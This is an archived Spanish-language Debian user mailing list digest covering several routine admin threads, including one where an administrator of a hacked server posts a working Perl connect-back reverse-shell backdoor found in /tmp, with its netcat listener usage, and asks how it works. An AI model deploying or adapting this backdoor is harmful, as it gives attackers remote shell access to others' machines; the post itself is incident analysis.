> chroot).

Usuarios virtuales en chroot: podrias  ampliarnos el concepto?

Los paquetes instalados eran todos de repositorios oficiales?

> el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web
> bases de datos ssh y el equipo se colgo..
> 
> fue una gran sorpresa al darme cuenta que cuando inicie la makina en
> modo rescate  /var estaba vacio practicamente piendo en un rm
> -rf /var :-(...  por ende.. no tengo logs para buscar algun tipo de
> atake.. pero buscando en /tmp  encontre algo interezante un archivo
> llamado _conex.pl_
> 
> cuyo contenido muestro aqui.
> > 

[Codigo perl de una puerta trasera]
Lo que entiendo es que te instalaron y ejecutaron un programa para abrir
una puerta traseracon exito.
Lo que no me queda claro es si para acceder a tu host explotó alguna vuln o
lo hizo desde dentro...en tal caso...como entro?

Saludos
> y me dije que diablos !!!...
> entonces.. me decidi a preguntar a la lista por si alguien mas o menos
> entiende este script o podria decir como funciona.. para tomar
> precauciones en la proxima reinstalacion del servidor. y asi protejer
> mejor los servicios.  y claro esta.. asi  todos aprendemos un poquito
> mas de seguridad que es tan importante.
> Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un
> informe claro y Tecnico de lo sucedido aqui.
> 
> Atentamente
> Nelson Lopez.
> 
> 


- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqcSzkw12RhFuGy4RAnKHAJ4ujgjwVWJMWRR6CHi7wzHKZ/33dQCePD4P
5vvvpYMiqb7AVNXNUepXBBs=
=RIz4
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Arrancar un programa grafico sin iniciar sesion interactiva: e.g. vmware

2005-06-10 Por tema Miguel Cordero

Hola:

Quiero iniciar un programa que necesita de las X automaticamente al
arrancar el pc, pero sin que un usurio tenga que hacerlo
interactivamente. En concreto el vmware con varias máquinas virtuales
que necesito esten disponibles en red al iniciar el pc host, pero sin
que un usuario tenga que arrancarlo a mano. Encontré un enlace
( http://www.windowsitpro.com/Articles/Index.cfm?ArticleID=42607 ) sobre
como hacerlo en windows pero no se como en linux. La idea es que en el
pc host pueda hacer sesion interactiva una persona, trabajar en linux
sin preocuparse de  arrancar la máquinas virtuales cada vez que enciende
el ordenador.
Supongo que tendría que decirle a debian que al arrancar hiciese sesión
un usuario automáticamente y este iniciase un vncserver o similar y en
el inicio de la sesion gráfica que arrancase automaticamente el vmwware.
Así el usuario local no se enteraría y si el administrador necesita
configurar algo en las máquinas podría acceder a través de vnc.
Pero no se muy bien que comandos o archivos debo usar en el arranque
para esto.
 ¿Me dais alguna pista?

Gracias
-- 
Miguel Cordero <[EMAIL PROTECTED]>


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

OFFTOPIC: memorias/conclusiones de la GUADEC 2005

2005-06-10 Por tema Carlos Porter

En los ultimos dias no he podido seguir el desarrollo
de la ultima GUADEC celebrada en Alemania (no recuerdo
el nombre del pueblo) y me gustaría saber si alguien
conoce una pagina en donde esten las
ponencias/discusiones que tuvieron lugar en el evento.

Normalmente no sigo estos eventos, pero me parece que
ahora esta convención es particularmente interesante
por el ansiado debate: C# vs Java en el escritorio
Gnome, aunque estoy a favor de Java (si Harmony llega
a ser una realidad) a C# no le faltan meritos para
tomar su lugar (a pesar del asecho de Microsoft).

Ambos lenguajes tienen el mismo problema no son
libres, mientras que otras alternativas prometedoras
(y libres) como Python no se han abierto paso en las
discusiones (acaso ará falta un grupo dedicado
exclusivamente a promover python en los foros).

Para mi, si Java y C# no son viables (el problema es
como llegar a conclusión de manera definitiva)
entonces la alternativa ideal sería Python... o no lo sería?



__ 
Renovamos el Correo Yahoo! 
Nuevos servicios, más seguridad 
http://correo.yahoo.es


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Opiniones ?... Seguridad/hacking-.

Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del
crimen contra un servidor que fue hackeado :-(

en primera instancia puedo creer que el ataque fue hecho via web ya que
la maquina en si.. no tiene contacto fisico alguno con el exterior  a
escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en
chroot).

el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web
bases de datos ssh y el equipo se colgo..

fue una gran sorpresa al darme cuenta que cuando inicie la makina en
modo rescate  /var estaba vacio practicamente piendo en un rm
-rf /var :-(...  por ende.. no tengo logs para buscar algun tipo de
atake.. pero buscando en /tmp  encontre algo interezante un archivo
llamado _conex.pl_

cuyo contenido muestro aqui.


--C O D E-

#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox,
for example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl
connect.pl  
# 
# The supplied exploit code is not to be used for malicious purpose, but
for educational purpose only. The Authors and 1ndonesian Security Team
WILL NOT responsible for anything happened by the couse of using all
information on these website.
# -

use Socket;
$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security
Team (1st)\n\n";
$cmd= "lpd";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print STDOUT $pamer;
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

--F I N  C O D E-

y me dije que diablos !!!...
entonces.. me decidi a preguntar a la lista por si alguien mas o menos
entiende este script o podria decir como funciona.. para tomar
precauciones en la proxima reinstalacion del servidor. y asi protejer
mejor los servicios.  y claro esta.. asi  todos aprendemos un poquito
mas de seguridad que es tan importante.

Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un
informe claro y Tecnico de lo sucedido aqui.

Atentamente
Nelson Lopez.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Configurar LG Mod GSA-4163B

2005-06-10 Por tema peter holm

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hola:
Me acabo de comprar un LG Modelo GSA-4163B (regrabadora DVD) y no logro
hacerla funcionar, es interna y la conecte como externa por USB, el sistema
la reconoce:

   scsi0 : SCSI emulation for USB Mass Storage devices
   Vendor: HL-DT-ST  Model: DVDRAM GSA-4163B  Rev: A100
   Type:   CD-ROM ANSI SCSI revision: 02
   sr0: scsi3-mmc drive: 40x/40x writer dvd-ram cd/rw xa/form2 cdda tray
   Attached scsi CD-ROM sr0 at scsi0, channel 0, id 0, lun 0
   USB Mass Storage device found at 5
   Attached scsi generic sg0 at scsi0, channel 0, id 0, lun 0,  type 5

¿Donde puedo encontrar info para configurar la unidad?, cuando intento
grabar algo en un CD me dice al principio que "ocurrio un error no
importante" y al poco me dice que baje la velocidad (he probado 16x, 8, 4 y
1, todas las velocidades con el mismo mensaje).

He tenido en la misma conexion una regrabadora CD sin problemas, por lo que
si la unidad esta bien deberia funcionar sin mas problemas (creo).

Un saludo. Peter Holm.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFCqbgKlWZhvR0ofHARAn9AAJ9lrP/r87ok6oeskhaL/mjoTKfCogCcCBdP
jPJk72B4/YzlWRB/IbkDW7g=
=3JkE
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Apertura de pdf en Mozilla y familia

2005-06-10 Por tema Josep Ysern

Desde hace poco, el firefox y familia (Mozilla, galeon, epiphany, 
etc.) no me abren los pdf en línea: los cargan (aparentemente), pero 
la pantalla queda vacía. Una misma dirección de carga de un pdf es 
abierta sin problemas por Konqueror -y por un Mozilla 1.6 descargado 
desde su web- pero no por Mozilla-firefox-galeón-epiphany, etc., de 
debian. En principio, el mozplugger está instalado y los plugins 
correspondientes al acroread, etc., también; igualmente, tengo 
instalados todos los visores de pdf más usuales... ¿Dónde puede estar 
el error?

He lanzado el firefox desde consola y me aparece esto:

~$ mozilla-firefox

Usage: /usr/bin/acroread [options] [list of files]

Options:
--display=
This option specifies the host and display to use.
--screen=
[...]

y sigue con un menú de ayuda. Es como si la instrucción estuviera mal 
puesta, la faltara algún parámetro y se limitara a soltar la 
información de ayuda. ¿Dónde y cómo se puede corregir el tema?

Gracias por adelantado,

Josep


__ 
Renovamos el Correo Yahoo! 
Nuevos servicios, más seguridad 
http://correo.yahoo.es


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Servicios al arranque

On 6/10/05, mario <[EMAIL PROTECTED]> wrote:
> El vie, 10-06-2005 a las 10:16 -0400, Manuel . escribió:
> > EStimados,.
> > En fedora hay un programa que te permite en modo consola con una
> > interfaz muy facil editar los servicios que quieres cargar al inicio.
> >
> > Existe algo asi en debian?
> 
> si, rcconf
> 
> > Muchas gracias.
> > Atte
> > Manuel
> >
> 
> 
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 
> 
Otros 3 para que elijas :

[EMAIL PROTECTED]:~$ apt-cache show sysvconfig
Package: sysvconfig
Priority: optional
Section: admin
Installed-Size: 144
Maintainer: John Hasler <[EMAIL PROTECTED]>
Architecture: all
Version: 0.10
Depends: dialog
Filename: pool/main/s/sysvconfig/sysvconfig_0.10_all.deb
Size: 23482
MD5sum: fefe7aa94d4c5513e5ea1a6d98ee5fad
Description: A text menu based utility for configuring init script links
 It provides extensive explanations at each step.
 Some features supported by sysvconfig are:
  - Enable or disable services.
  - Edit init links.
  - Restore from backup file if you make a mistake.
  - Menu or command line interface.
  - View all services, each with its status and a brief description.
 Sysvconfig also installs a 'service' script much like that found on
 Red Hat systems.

[EMAIL PROTECTED]:~$  apt-cache show sysv-rc-conf
Package: sysv-rc-conf
Priority: optional
Section: admin
Installed-Size: 104
Maintainer: Joe Oppegaard <[EMAIL PROTECTED]>
Architecture: all
Version: 0.98-3
Depends: libcurses-ui-perl, sysvinit (>= 2.85-5), sysv-rc
Filename: pool/main/s/sysv-rc-conf/sysv-rc-conf_0.98-3_all.deb
Size: 22536
MD5sum: c84fc1613146ede791aad81584a4b6c5
Description: SysV init runlevel configuration tool for the terminal
 sysv-rc-conf provides a terminal GUI for managing "/etc/rc{runlevel}.d/"
 symlinks.  The interface comes in two different flavors, one that simply
 allows turning services on or off and another that allows for more fine tuned
 management of the symlinks.  Unlike most runlevel config programs, you can
 edit startup scripts for any runlevel, not just your current one.

Y bajo kde:
[EMAIL PROTECTED]:~$ apt-cache show ksysv
Package: ksysv
Priority: optional
Section: admin
Installed-Size: 588
Maintainer: Debian Qt/KDE Maintainers 
Architecture: i386
Source: kdeadmin
Version: 4:3.3.2-1
Depends: kdelibs4 (>= 4:3.3.2-1), libart-2.0-2 (>= 2.3.16), libc6 (>=
2.3.2.ds1-4), libfam0c102, libgcc1 (>= 1:3.4.1-3), libice6 | xlibs (>>
4.1.0), libidn11 (>= 0.5.2), libpng12-0 (>= 1.2.8rel), libqt3c102-mt
(>= 3:3.3.3), libsm6 | xlibs (>> 4.1.0), libstdc++5 (>= 1:3.3.4-1),
libx11-6 | xlibs (>> 4.1.0), libxext6 | xlibs (>> 4.1.0), libxrender1,
zlib1g (>= 1:1.2.1)
Suggests: khelpcenter
Filename: pool/main/k/kdeadmin/ksysv_3.3.2-1_i386.deb
Size: 155504
MD5sum: 4b8084748b9bb034cbb09785087c6e58
Description: KDE SysV-style init configuration editor
 KDE is a powerful Open Source graphical desktop environment
 for Unix workstations. It combines ease of use, contemporary
 functionality, and outstanding graphical design with the
 technological superiority of the Unix operating system.
 .
 This program allows you to edit your start and stop scripts using a
 drag and drop GUI.
 .
 This package is part of the official KDE admin module.

Re: Urgente. Se me ha desconfigurado el kernel.

2005-06-10 Por tema Antonio Trujillo Carmona

El vie, 10-06-2005 a las 16:09 +0200, Pablo Braulio escribió:
> Hola a todos.
> Estaba tratando de configurar user-mode (según el artículo de Todo Linux) y 
> no 
> que narices ha pasado que se me ha desconfigurado el kernel que tenía 
> compilado por mi (2.6.10).
> Antes de cagarla mas. ¿Como puedo recuperar mi configuración anterior del 
> kernel?.
> No se si make oldconfig es lo mas apropiado, pues me hace muchas preguntas al 
> ejecutar.
si lo habias hecho al estilo debian en /etc/boot tendras un
config-[la_version_que_sea] que puedes copiarlo a /usr/src/linux
como .config (es escondido por empezar con un punto) y habras recuperado
tu configuración
-- 
Antonio Trujillo Carmona <[EMAIL PROTECTED]>



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Urgente. Se me ha desconfigurado el kernel.

2005-06-10 Por tema Pablo Braulio


>
> Ayudaría que cuentes qué has hecho y qué errores te da y en que momento.
>

Pues he tratado de configurar user-mode-linux, y para ello hay que configurar 
un kernel y compilarlo, mediante el comando: make menuconfig ARCH=um

Ha bastado copiando el config de boot en los sources.
-- 
Saludos.
Pablo

Fingerprint 5607 40CF 45EF D490 B794  5056 D7B2 C3DC ABF1 CE49
Jabber: [EMAIL PROTECTED]
http://www.aldiagestion.com


pgpnT7ODFHY4T.pgp
Description: PGP signature

Re: Placa de red

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Alejandro Kurchis wrote:
> Hola,
> 
> No soy experto en Linux por lo tanto recurro a uds. para que me expliquen
> como se instala una placa de red que no tiene soporte en el kernel.

Si no tiene soporte en el kernel, dudo que puedas usarla...
> 
> En ese sentido, un amigo m edijo que editara el archivo
> /etc/modprobe.d/aliases y agregara una nueva linea como esta:
> 
> aliaseth0modulo_interface_red
En ese caso, si tiene soporte, pero es modular.
En ese caso lo que debes hacer es:
como root en los 2 casos:
# modprobe modulo_red
# echo "modulo_red" >> /etc/modules

> Pregunto: es solo esto o hay algo mas ???

eso


> Muchas gracias !!!
> 
> A.K.
> 
> 


- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqatqkw12RhFuGy4RAqR6AJ4413h1CsEPuOu2rTVoXQ0Dsdln8QCfcmsq
O4QZbHn7y3M9GN/l7O25QjI=
=93gw
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Servicios al arranque

2005-06-10 Por tema Manuel .

Muchas Gracias!!!


2005/6/10, mario <[EMAIL PROTECTED]>:
> El vie, 10-06-2005 a las 10:16 -0400, Manuel . escribió:
> > EStimados,.
> > En fedora hay un programa que te permite en modo consola con una
> > interfaz muy facil editar los servicios que quieres cargar al inicio.
> >
> > Existe algo asi en debian?
> 
> si, rcconf
> 
> > Muchas gracias.
> > Atte
> > Manuel
> >
> 
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 
>

Re: Servicios al arranque

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

marcos toro wrote:
> Hola,
> 
> On Fri, 2005-06-10 at 10:16 -0400, Manuel . wrote:
> 
>>EStimados,.
>>En fedora hay un programa que te permite en modo consola con una
>>interfaz muy facil editar los servicios que quieres cargar al inicio.
>>
>>Existe algo asi en debian?
>>Muchas gracias.
>>Atte
>>Manuel
>>
> 
> 
> man update-rc.d

update-rc.d si bien cumple ese objetivo, no tiene las caracteríscticas
que el amigo menciona: no tiene interfaz fácil de editar.
La respuesta a ese respecto es rcconf

> 
> Saludos cordiales,


- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqarzkw12RhFuGy4RAlItAJ44J9Ncpl4wAk2tzk9jVzcp3b4VeACfeAxV
7t6LwVzHshyUcNDN/cSR3cI=
=ryuT
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Urgente. Se me ha desconfigurado el kernel.

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Pablo Braulio wrote:
> Hola a todos.
> Estaba tratando de configurar user-mode (según el artículo de Todo Linux) y 
> no 
> que narices ha pasado que se me ha desconfigurado el kernel que tenía 
Ayudaría que cuentes qué has hecho y qué errores te da y en que momento.

> compilado por mi (2.6.10).
> Antes de cagarla mas. ¿Como puedo recuperar mi configuración anterior del 
> kernel?.
Si es la predeterminada de Debian, está en /boot/config-2.x.y, si era
una que compilaste a mano y no la guardaste en ningún lado.lo siento
mucho...

> No se si make oldconfig es lo mas apropiado, pues me hace muchas preguntas al 
> ejecutar.
?!



- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqap/kw12RhFuGy4RAmgEAJ4rk38KJzyLQk/zL62kcSXBONaqlQCfYWrG
M/lm2mDbOroaxd9Zvju4QVI=
=oTaS
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

RE: Han cambiado los source.lists????

2005-06-10 Por tema Omar Beltran

¿Disculpa la intromisión? pero me podrias
explicar mejor lo del cambio de nombre de los repositorios
y como deberia de colocar el apt-setup o donde puedo
encontrar la info, ya que todavio no comprendo bien la
transiciones que hace debian entre sus diferentes versiones
estos, ya lei http://www.debian.org/releases/testing/ pero
sigo con dudas.

Mil Gracias mas de uno vera la Luz  ;)

Omar B

-Mensaje original-
De: Fernando [mailto:[EMAIL PROTECTED]
Enviado el: Jueves 9 de Junio de 2005 12:16 PM
Para: Lista_Debian_Spanish
Asunto: Re: Han cambiado los source.lists

[EMAIL PROTECTED] wrote:

>Desde hace 1 dia me encuentro con que muchos de los sitios que tengo
colocados
>en el source list , me dan erro 404 no encontrado al igual que el de
>security.debian.org tengo la version testing.
>Gracias
>Un saludo.
>
>
>
>
Ya se ha contestado en otro hilo. Testing solo tiene soporte de
seguridad cuando se va a sacar una nueva stable.
Mira cada repositorio por separado, quizas ahora lo llamen
etch.(suponiendo que quieras seguir en testing)
Un saludo.

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]

__
Correo Yahoo!
Espacio para todos tus mensajes, antivirus y antispam ¡gratis! 
Regístrate ya - http://correo.yahoo.com.mx/ 

-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Placa de red

2005-06-10 Por tema Alejandro Kurchis

Hola,

No soy experto en Linux por lo tanto recurro a uds. para que me expliquen
como se instala una placa de red que no tiene soporte en el kernel.

En ese sentido, un amigo m edijo que editara el archivo
/etc/modprobe.d/aliases y agregara una nueva linea como esta:

aliaseth0modulo_interface_red

Pregunto: es solo esto o hay algo mas ???

Muchas gracias !!!

A.K.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: LVM en sarge

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Unknown wrote:
> hola, estoy interesado en instalar sarge sobre particiones LVM

Escelente(s) eleccione(s) ;)

> veo que en el disco de netboot ya trae esta opcion, me atrae mucho
> puesto que esto supone un maximo aprovechamiento del espacio en disco,
> Tengo experiencia en LVM de instalaciones que hice en fedora (en un
> pasado distante), funcionaba muy bien hasta que en una actualizacion ya
> no reinicio y no hubo ningun disco de rescate en la tierra que pudiera
> recuperar mi informacion :(, finalmente quede aterrado del los problemas
> potenciales que tiene, ahora que debian lo soporta de manera stable me
> gustaria que me contaran que tal jala y sobre todo si existen
> herramientas suficientemente potentes para poder recuperarse de fallos
> graves y no tan graves
Habría que ver que fue lo que realmente paso en tu sistema! ME llama la
atencion poderosamente, estoy seguro que el fallo no es de LVM en si,
sino algun problema de hardware, configuracion, etc.
Lo que si para evitar eso, quizas te convendria usar LVM+RAID en el caso
de algun servidor...

> Otra pregunta, no me queda muy claro cual es el fin de los grupos de
> volumenes (GV), se que al hacer los volumenes puedes hacer cualquier
> particion y modificarla segun se necesite pero entonces los GV?, sera
> para tener varias distros en el mismo particionamiento de LVM? y sino,
> es posible despues de particionar un disco completo con LVM instalarle
> otra distro en una particion y que lilo o grub los puedan cargar?, que
> tal guindorks?
> 
> bueno gracias por adelantado

Te recomiendo esta documentacion que es bastante clara y didáctica
respecto de qué es y como funciona LVM:
http://www-128.ibm.com/developerworks/linux/library/l-lvm/index.html

Y si te interesa, yo tengo un borrador para montar un sistema LVM con
cifrado de particiones ;)

http://www.eureka-linux.com.ar/docs/Cifrado%20de%20datos%20en%20LVM-reiserfs.html
> 
> 


- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqakkkw12RhFuGy4RAgpaAJ4/DLzunWulyoQUh71dUBVTOnI9yQCeLZqt
A5MVMlDctuRHuK/RuTw7Fis=
=NGsz
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Servicios al arranque

2005-06-10 Por tema mario

El vie, 10-06-2005 a las 10:16 -0400, Manuel . escribió:
> EStimados,.
> En fedora hay un programa que te permite en modo consola con una
> interfaz muy facil editar los servicios que quieres cargar al inicio.
> 
> Existe algo asi en debian?

si, rcconf

> Muchas gracias.
> Atte
> Manuel
> 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Servicios al arranque

2005-06-10 Por tema marcos toro

Hola,

On Fri, 2005-06-10 at 10:16 -0400, Manuel . wrote:
> EStimados,.
> En fedora hay un programa que te permite en modo consola con una
> interfaz muy facil editar los servicios que quieres cargar al inicio.
> 
> Existe algo asi en debian?
> Muchas gracias.
> Atte
> Manuel
> 

man update-rc.d

Saludos cordiales,
-- 
marcos toro <[EMAIL PROTECTED]>
ideando sistemas


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Servicios al arranque

2005-06-10 Por tema Manuel .

EStimados,.
En fedora hay un programa que te permite en modo consola con una
interfaz muy facil editar los servicios que quieres cargar al inicio.

Existe algo asi en debian?
Muchas gracias.
Atte
Manuel

Urgente. Se me ha desconfigurado el kernel.

2005-06-10 Por tema Pablo Braulio

Hola a todos.
Estaba tratando de configurar user-mode (según el artículo de Todo Linux) y no 
que narices ha pasado que se me ha desconfigurado el kernel que tenía 
compilado por mi (2.6.10).
Antes de cagarla mas. ¿Como puedo recuperar mi configuración anterior del 
kernel?.
No se si make oldconfig es lo mas apropiado, pues me hace muchas preguntas al 
ejecutar.
-- 
Saludos.
Pablo

Fingerprint 5607 40CF 45EF D490 B794  5056 D7B2 C3DC ABF1 CE49
Jabber: [EMAIL PROTECTED]
http://www.aldiagestion.com


pgpv6y9aoBctR.pgp
Description: PGP signature

binarios de usenet

2005-06-10 Por tema Unknown

disculpen, alquien conoce un programa para linux que pueda lidiar con
binarios, osea que los pueda unir, tengo instalado knode pero no puede
hacer eso.
gracias.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

sonido i810

2005-06-10 Por tema Ricardo Delgado

les hago la siguiente consulta cuando intento cargar el modulo de
sonido me da el siguiente error

insmod i810_audio
Using /lib/modules/2.4.27-2-586tsc/kernel/drivers/sound/i810_audio.o
/lib/modules/2.4.27-2-586tsc/kernel/drivers/sound/i810_audio.o:
/lib/modules/2.4.27-2-586tsc/kernel/drivers/sound/i810_audio.o:
unresolved symbol ac97_probe_codec_Redf32a8e
/lib/modules/2.4.27-2-586tsc/kernel/drivers/sound/i810_audio.o:
/lib/modules/2.4.27-2-586tsc/kernel/drivers/sound/i810_audio.o:
unresolved symbol ac97_set_dac_rate_R99dd7def
/lib/modules/2.4.27-2-586tsc/kernel/drivers/sound/i810_audio.o:
/lib/modules/2.4.27-2-586tsc/kernel/drivers/sound/i810_audio.o:
unresolved symbol ac97_release_codec_R0a40cae1
/lib/modules/2.4.27-2-586tsc/kernel/drivers/sound/i810_audio.o:
/lib/modules/2.4.27-2-586tsc/kernel/drivers/sound/i810_audio.o:
unresolved symbol ac97_set_adc_rate_R2f0e0a59
/lib/modules/2.4.27-2-586tsc/kernel/drivers/sound/i810_audio.o:
/lib/modules/2.4.27-2-586tsc/kernel/drivers/sound/i810_audio.o:
unresolved symbol ac97_alloc_codec_Ra481435a

cuando ingreso al entorno grafico lo siguiente

Sound server informational message:
Error while initializing the sound driver:
device /dev/dsp can't be opened (No such device)
The sound server will continue, using the null output device

Re: Como capturar una web diariamente

2005-06-10 Por tema mario

El vie, 10-06-2005 a las 14:22 +0200, 31 escribió:
> Bien, incluso puede que no se necesite wget, y ahora continuando con el 
> problema, como puedo conseguir que además de crear un jpg, el susodicho 
> demonio haga un login a un ftp, entre en un directorio y lo suba. Como le 
> digo al ftp desde un demonio, login tal, cd cual y put esto.

apt-get install ncftp

ncftpput --help

ncftpput -f /home/pepito/.ncftp.cfg /dir_remoto/ /ruta/archivo/local.jpg

en el archivo .ncftp.cfg tienes que poner 3 líneas:

host ftp.server.com
user usuarioftp
pass password_del_ftp


> 
> O Venres 10 Xuño 2005 13:15, Gotzon Astondoa escribiu:
> > Hola:
> >
> > Yo no lo he hecho nunca pero sé que:
> >
> > - wget permite bajar una página.
> > - html2jpeg permite... pues eso.
> > http://freshmeat.net/projects/html2jpg/
> > - y el cron permite ejecutar una tarea cuando quieras
> >
> > ta luego...
> >
> > - Original Message -
> > From: "31" <[EMAIL PROTECTED]>
> > To: 
> > Sent: Friday, June 10, 2005 12:52 PM
> > Subject: Como capturar una web diariamente
> >
> > > Hai algun programa que permita crear un demonio que todos los días la
> >
> > misma
> >
> > > hora haga una captura de una web y la guarde en formato jpg?
> > >
> > >
> > > __
> > > Renovamos el Correo Yahoo!
> > > Nuevos servicios, más seguridad
> > > http://correo.yahoo.es
> 
>   
> __ 
> Renovamos el Correo Yahoo! 
> Nuevos servicios, más seguridad 
> http://correo.yahoo.es
> 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Actualizar KDE

2005-06-10 Por tema Fco. Javier FernÃ¡dez Ãlvarez

El Viernes, 10 de Junio de 2005 08:29, [No A Las Patentes] escribió:
> German escribió:
> > Saludos lista, estoy tratando de actualizar a kde 3.4 desde los
> > repositorios de alioth pero por mas que hago apt-get install kde me dice
> > que ya tengo la ultima version
>
> Mi recomendacion... si tienes synaptic, puedes controlar -a traves del menu
> de opciones- que tipo de repositorio/version de paquetes lo que deseas
> instalar... y como me imagino que el repositorio alioth sera algo
> experimental, entonces synaptic, automaticamente tomaria solo los paquetes
> de ese repositorio y comprobaria a partir de eso la posible instalacion.
>
> Si esto ya no es posible, es -quisas- porque tienes una buena ensalada de
> cosas instaladas ;-)
>
> Saludos.

Lo que puedes hacer es esto:
# apt-get -t experimental install kde

Esto te instalara la mayor parte de los paquetes relacionados con kde y desde 
Alioth, eso si asegurate que no tienes el repositorio de debian experimental 
en tu sources.list, de ser asi simplemente comentalo y luego haz un update.

Saludos.

RE: Como capturar una web diariamente

Hazlo todo con un shell-script, y el ftp:

ftp -n HOST << quit
user USUARIO CLAVE
binary
lcd $DIR
put $nombre
get $nombre COMPRUEBA
quit

Saludos
> -Mensaje original-
> De:   31 [SMTP:[EMAIL PROTECTED]
> Enviado el:   viernes 10 de junio de 2005 14:23
> Para: debian-user-spanish@lists.debian.org
> Asunto:   Re: Como capturar una web diariamente
> 
> Bien, incluso puede que no se necesite wget, y ahora continuando con el 
> problema, como puedo conseguir que además de crear un jpg, el susodicho 
> demonio haga un login a un ftp, entre en un directorio y lo suba. Como le 
> digo al ftp desde un demonio, login tal, cd cual y put esto.
> 
> O Venres 10 Xuño 2005 13:15, Gotzon Astondoa escribiu:
> > Hola:
> >
> > Yo no lo he hecho nunca pero sé que:
> >
> > - wget permite bajar una página.
> > - html2jpeg permite... pues eso.
> > http://freshmeat.net/projects/html2jpg/
> > - y el cron permite ejecutar una tarea cuando quieras
> >
> > ta luego...
> >
> > - Original Message -
> > From: "31" <[EMAIL PROTECTED]>
> > To: 
> > Sent: Friday, June 10, 2005 12:52 PM
